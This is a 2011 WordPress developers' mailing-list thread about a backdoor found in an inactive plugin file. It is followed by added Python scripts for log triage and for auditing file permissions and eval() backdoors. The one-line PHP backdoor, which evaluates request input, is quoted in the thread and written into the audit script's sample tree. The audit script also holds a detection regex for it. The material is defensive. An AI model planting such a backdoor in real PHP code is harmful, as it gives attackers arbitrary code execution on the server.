[wp-hackers] Possible Exploit

Glenn Pegden glenn at pegden.com
Sun Jun 12 15:18:40 UTC 2011


Given seemingly knowledgeable WordPress users' propensity to advise others to
set "other" access on folders to everything (aka "just chmod it to 777"),
it's amazing we don't see this more often.

The codex has it right: "No directories should ever be given 777, even upload
directories. Since the php process is running as the owner of the files, it
gets the owner's permissions and can write to even a 755 directory." But
sadly not everyone "gets it" until it's too late.

BTW I'm not saying this happened in this case, only that if you choose to
use shared hosting (and with VPSs so cheap, why would you any more?) then you
must view "other" as hostile. I've seen so many compromised sites where it's
been taken by another user on the same server.

On Sun, Jun 12, 2011 at 2:05 PM, Charles Frees-Melvin <wordpress at cefm.ca> wrote:

> That is quite common. Many attacks are from other non-secure sites on the
> same server.
>
> --
> Charles E. Frees-Melvin
> www.cefm.ca
>
> On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:
>
> > Wrote to my hosting account. This is what they are saying:
> >
> > > Due to the clustered structure of our systems there is no single log file
> > > for you to use as your site is served by many servers. I would suggest
> > > you to please make a full audit of your account in that regard and remove
> > > the malicious code if you find any.
> >
> >
> > Crazy - I have like 15 websites on there.
> >
> > Kindly,
> >
> > Baki Goxhaj
> > www.wplancer.com | proverbhunter.com | www.banago.info
> >
> >
> > On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
> >
> >> Check your access logs for strange requests at the time the file was
> >> detected. You'll hopefully be able to see a POST request to one of the
> >> plugin files at that point in time, or perhaps a long GET request. If you
> >> can narrow down the file attacked, you can work out which plugin has the
> >> vulnerability in it.
> >>
> >> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
> >>
> >>> I removed it as soon as I found out about it. I hope my other installs are
> >>> not infected as I don't have the file monitor running there.
> >>>
> >>> Kindly,
> >>>
> >>> Baki Goxhaj
> >>> www.wplancer.com | proverbhunter.com | www.banago.info
> >>>
> >>>
> >>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:
> >>>
> >>>> On Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
> >>>>> Just got an email from my file monitor plugin that a file had been
> >>>>> changed - it is an inactive plugin file, strangely enough. Here is the
> >>>>> content of the file now:
> >>>>>
> >>>>> <?php
> >>>>> if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));
> >>>>> ?>
> >>>>>
> >>>>> Is this something dangerous?
> >>>>
> >>>> Yes, this is extremely dangerous. It's basically a backdoor to allow
> >>>> arbitrary PHP code execution on your server. You should remove that
> >>>> code immediately, change passwords, do a full cleanup, etc.
> >>>> _______________________________________________
> >>>> wp-hackers mailing list
> >>>> wp-hackers at lists.automattic.com
> >>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>



-- 
Pegden.com IT Management Services
5 Reedsdale Avenue, Gildersome, Leeds, LS27 7JE.
Tel: 0113 815 3777
Business Website: http://www.pegden.com
Personal Website: http://glenn.pegden.com
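Dion Hulse's advice in the thread above (look at the access logs around the time the file monitor fired, for a POST to a plugin file or an unusually long GET) is mechanical enough to script. The following is an added example, not code from anyone in this thread: it parses Apache/nginx "combined" log lines, keeps only those inside a window around the detection time, and flags the two request shapes he describes. The log lines, client addresses, paths and the 12:45 UTC detection time are constructed for the example; the 30-minute window and the 256-character threshold for a "long" GET are assumptions to tune per site.

```python
"""Triage a web-server access log around the time a changed file was detected.

Added example, not code from anyone in this thread. Within a window around the
detection time it flags POST requests to plugin files and unusually long GET
requests. The log lines below are constructed (Apache/nginx "combined" format).
"""
import re
from datetime import datetime, timedelta, timezone

# Combined log format: host ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log. The backdoor in the thread sat in an inactive plugin
# file, so requests under /wp-content/plugins/ are the ones worth a look.
# The last line is a day earlier and shows the time window excluding it.
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [12/Jun/2011:12:40:02 +0000] "GET /wp-content/plugins/old-plugin/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jun/2011:12:41:15 +0000] "POST /wp-content/plugins/old-plugin/upload.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [12/Jun/2011:12:42:00 +0000] "GET /wp-content/plugins/old-plugin/helper.php?asc='
    + "A" * 600 + ' HTTP/1.1" 200 11 "-" "curl/7.21"',
    '192.0.2.10 - - [12/Jun/2011:12:43:30 +0000] "GET /2011/06/hello-world/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jun/2011:12:44:01 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Jun/2011:09:00:00 +0000] "POST /wp-content/plugins/old-plugin/upload.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
])


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def triage(log_text, detected_at, window=timedelta(minutes=30), long_get=256):
    """Return (kind, client, script path) for suspicious requests near detected_at.

    Two signals: a POST to anything under /wp-content/plugins/, and a GET whose
    request target is longer than long_get characters (long encoded parameters
    stand out against normal page views).
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or abs(rec["time"] - detected_at) > window:
            continue
        target = rec["path"]
        script = target.split("?", 1)[0]  # drop the query string for reporting
        if rec["method"] == "POST" and script.startswith("/wp-content/plugins/"):
            findings.append(("post-to-plugin", rec["host"], script))
        elif rec["method"] == "GET" and len(target) > long_get:
            findings.append(("long-get", rec["host"], script))
    return findings


def triage_sample():
    """Run the triage over the constructed log as if the file monitor fired at 12:45 UTC."""
    detected = datetime(2011, 6, 12, 12, 45, tzinfo=timezone.utc)
    return triage(SAMPLE_LOG, detected)


if __name__ == "__main__":
    for kind, host, script in triage_sample():
        print(f"{kind:15} {host:15} {script}")
```

On a real host you would read the rotated access log into `log_text` and pass the timestamp from the file monitor's alert as `detected_at`; the script path in each finding is what narrows the search down to the plugin Dion mentions.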
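Glenn Pegden's point about "other" being hostile on shared hosting, and the backdoor Baki Goxhaj's file monitor caught, are two checks a site owner can run over the whole install. The following is an added example, not code from the thread, from WordPress or from its codex: it walks a tree and reports anything the "other" permission class can write to (the chmod 777 anti-pattern) and any PHP file that hands request input straight to `eval()`. The regular expression is a deliberately narrow signature I chose to match the quoted backdoor shape, not a general malware scanner, and the sample tree it audits is constructed in a temporary directory.

```python
"""Audit a WordPress tree for the two problems raised in this thread.

Added example, not code from the thread, WordPress or its codex. It reports
world-writable files and directories (the "just chmod it to 777" anti-pattern)
and PHP files that pass request input to eval(), the shape of the backdoor the
thread quotes. The sample tree is built in a temporary directory and removed.
"""
import os
import re
import shutil
import stat
import tempfile

# eval() whose argument derives from a request superglobal. Deliberately narrow:
# it matches the backdoor shape quoted in the thread, not every use of eval().
EVAL_FROM_REQUEST = re.compile(
    rb"eval\s*\([^;]*?\$_(?:REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE
)


def world_writable(path):
    """True if the 'other' class has write permission on path (e.g. mode 777 or 666)."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_tree(root):
    """Walk root and return sorted (finding, path relative to root) pairs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if dirpath != root and world_writable(dirpath):
            findings.append(("world-writable-dir", os.path.relpath(dirpath, root)))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if world_writable(full):
                findings.append(("world-writable-file", rel))
            if name.endswith(".php"):
                with open(full, "rb") as fh:
                    if EVAL_FROM_REQUEST.search(fh.read()):
                        findings.append(("eval-of-request-input", rel))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed WordPress-like tree with one bad directory and one bad file."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    # Explicit modes for every directory and file, so the result does not depend on umask.
    for rel in ("wp-content", "wp-content/uploads", "wp-content/plugins",
                "wp-content/plugins/old-plugin"):
        os.mkdir(os.path.join(root, rel), 0o755)
    os.chmod(os.path.join(root, "wp-content", "uploads"), 0o777)  # the anti-pattern
    plugin = os.path.join(root, "wp-content", "plugins", "old-plugin")
    clean = os.path.join(plugin, "old-plugin.php")
    with open(clean, "wb") as fh:
        fh.write(b"<?php\n// harmless plugin bootstrap\nadd_action('init', 'old_plugin_init');\n")
    os.chmod(clean, 0o644)
    backdoor = os.path.join(plugin, "helper.php")
    with open(backdoor, "wb") as fh:
        # Exactly the content the thread's file monitor reported.
        fh.write(b"<?php\nif(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));\n?>\n")
    os.chmod(backdoor, 0o666)  # world-writable file: any other account on the host can alter it
    return root


def audit_sample_tree():
    """Build the sample tree, audit it, remove it, and return the findings."""
    root = build_sample_tree()
    try:
        return audit_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding, rel in audit_sample_tree():
        print(f"{finding:22} {rel}")
```

Against a live site, call `audit_tree()` on the document root (for instance `audit_tree("/var/www/html")`, a placeholder path) from the account that owns the files. Because the PHP process already runs as the owner, as the codex passage Glenn quotes says, every `world-writable-*` finding is permission that only a different account on the same server could be using.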

